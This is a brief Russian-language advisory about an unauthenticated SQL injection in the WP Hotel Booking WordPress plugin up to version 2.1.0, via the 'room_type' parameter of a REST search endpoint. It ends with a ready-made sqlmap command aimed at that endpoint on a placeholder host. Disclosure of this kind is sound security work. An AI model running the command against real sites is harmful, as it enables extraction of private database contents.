
WP Hotel Booking <= 2.1.0 - Неаутентифицированная SQL-инъекция
WP Hotel Booking <= 2.1.0 - SQL-инъекция без аутентификации
Плагин WP Hotel Booking для WordPress уязвим к SQL-инъекции через параметр 'room_type' конечной точки REST API /wphb/v1/rooms/search-rooms во всех версиях до 2.1.0 включительно из-за недостаточного экранирования пользовательского параметра и отсутствия достаточной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие запросы, которые можно использовать для извлечения конфиденциальной информации из базы данных.
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent